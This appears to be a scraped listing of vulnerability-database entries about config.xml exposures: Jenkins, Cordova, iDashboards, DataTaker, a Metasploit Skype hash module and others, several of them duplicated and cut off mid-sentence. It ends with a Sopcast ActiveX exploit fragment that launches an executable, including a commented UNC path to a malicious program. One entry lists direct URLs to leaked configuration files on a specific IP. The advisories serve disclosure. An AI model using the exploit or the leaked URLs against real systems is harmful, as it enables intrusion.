CVE-2018-1999001

A unauthorized modification of configuration vulnerability exists in Jenkins 2.132 and earlier, 2.121.1 and earlier in User.java that allows attackers to provide crafted login credentials that cause Jenkins to move the config.xml file from the Jenkins home directory. If Jenkins is started without...

Jenkins Unauthorized User Resets Some Global Configurations Vulnerability

Jenkins is an open source software project , is based on Java development of a continuous integration tool for monitoring continuous repetitive work , aims to provide an open and easy to use software platform to make continuous integration of software possible . Jenkins unauthorized user reset pa...

CVE-2018-1999001

A unauthorized modification of configuration vulnerability exists in Jenkins 2.132 and earlier, 2.121.1 and earlier in User.java that allows attackers to provide crafted login credentials that cause Jenkins to move the config.xml file from the Jenkins home directory. If Jenkins is started without...

CVE-2018-1999001

A unauthorized modification of configuration vulnerability exists in Jenkins 2.132 and earlier, 2.121.1 and earlier in User.java that allows attackers to provide crafted login credentials that cause Jenkins to move the config.xml file from the Jenkins home directory. If Jenkins is started without...

Design/Logic Flaw

Jenkins before versions 2.44, 2.32.2 is vulnerable to a user data leak in disconnected agents' config.xml API. This could leak sensitive data such as API tokens SECURITY-362...

CVE-2017-2603

Jenkins before versions 2.44, 2.32.2 is vulnerable to a user data leak in disconnected agents' config.xml API. This could leak sensitive data such as API tokens SECURITY-362...

CVE-2018-10079

Geist WatchDog Console 3.2.2 uses a weak ACL for the C:\ProgramData\WatchDog Console directory, which allows local users to modify configuration data by updating 1 config.xml or 2 servers.xml...

CVE-2018-7209

An issue was discovered in iDashboards 9.6b. It allows remote attackers to obtain sensitive information via a direct request for the idashboards/config.xml URI, as demonstrated by intranet URLs for reports...

CVE-2018-7209

An issue was discovered in iDashboards 9.6b. It allows remote attackers to obtain sensitive information via a direct request for the idashboards/config.xml URI, as demonstrated by intranet URLs for reports...

Western Digital ShareSpace <= 2.3.02 WEB GUI Information Disclosure Vulnerability - Active Check

Western Digital ShareSpace is prone to an information disclosure vulnerability. SPDX-FileCopyrightText: 2017 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only CPE =...

Modifiable Secondary Configuration Values

cordova-android has modifiable secondary configuration values. If an application is created without explicit values set in the config.xml file, attackers can set these variables by using Intent. Leveraging this, they can change the behavior of the application...

Code injection

Apache Cordova Android before 3.7.2 and 4.x before 4.0.2, when an application does not set explicit values in config.xml, allows remote attackers to modify undefined secondary configuration variables preferences via a crafted intent: URL...

CVE-2015-1835

Apache Cordova Android before 3.7.2 and 4.x before 4.0.2, when an application does not set explicit values in config.xml, allows remote attackers to modify undefined secondary configuration variables preferences via a crafted intent: URL...

DataTaker DT80 dEX 1.50.012 Sensitive Configuration Exposure Vulnerability

DataTaker DT80 dEX version 1.50.012 suffers from an information disclosure vulnerability. + Title: DataTaker DT80 dEX 1.50.012 - Sensitive Configurations Exposure + Credits / Discovery: Nassim Asrir + Author Contact: email protected || https://www.linkedin.com/in/nassim-asrir-b73a57122/ + Author...

DataTaker DT80 dEX 1.50.012 - Information Disclosure

Title: DataTaker DT80 dEX 1.50.012 - Sensitive Configurations Exposure + Credits / Discovery: Nassim Asrir + Author Contact: [email protected] || https://www.linkedin.com/in/nassim-asrir-b73a57122/ + Author Company: Henceforth + CVE: CVE-2017-11165 Vendor: ===============...

Jenkins < 2.44 / 2.32.x < 2.32.2, Jenkins Operations Center < 1.625.22.1 / 2.7.22.0.1 / 2.32.2.1, and Jenkins Enterprise < 1.651.22.1 / 2.7.22.0.1 / 2.32.2.1 Multiple Vulnerabilities

The remote web server hosts a version of Jenkins that is prior to 2.44, or a version of Jenkins LTS prior to 2.32.2, or else a version of Jenkins Operations Center that is 1.625.x.y prior to 1.625.22.1, 2.7.x.0.y prior to 2.7.22.0.1, or 2.x.y.x prior to 2.32.2.1, or else a version of Jenkins...

欧朋浏览器之广告主后台敏感信息泄漏漏洞（泄漏内容证明）

简要描述： J2EE架构安全 详细说明： 泄漏点： http://59.151.113.225/WEB-INF/web.xml http://59.151.113.225/WEB-INF/spring/webmvc-config.xml 漏洞证明： Spring+Freemaker 反编译class文件...

D-Link DSL Router Remote Authentication Bypass Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/13679/info Various D-Link DSL routers are susceptible to a remote authentication bypass vulnerability. This issue is due to a failure of the devices to require authentication in certain circumstances. This vulnerability...

Windows Gather Skype Saved Password Hash Extraction

This module finds saved login credentials for the Windows Skype client. The hash is in MD5 format that uses the username, a static string "\nskyper\n" and the password. The resulting MD5 is stored in the Config.xml file for the user after being XOR'd against a key generated by applying 2 SHA1...

Sopcast SopCore Control - &#039;sopocx.ocx&#039; Command Execution

window.onload=function SopPlayer.InitPlayer; //SopPlayer.SetExternalPlayer"\\192.168.0.1\c$\PATH\TO\MALICIOUSPROGRAM.EXE"; SopPlayer.SetExternalPlayer"c:\WINDOWS\system32\calc.exe"; SopPlayer.SetSopAddress"sop://broker.sopcast.com:3912/6002"; //A LIVE CHANNEL...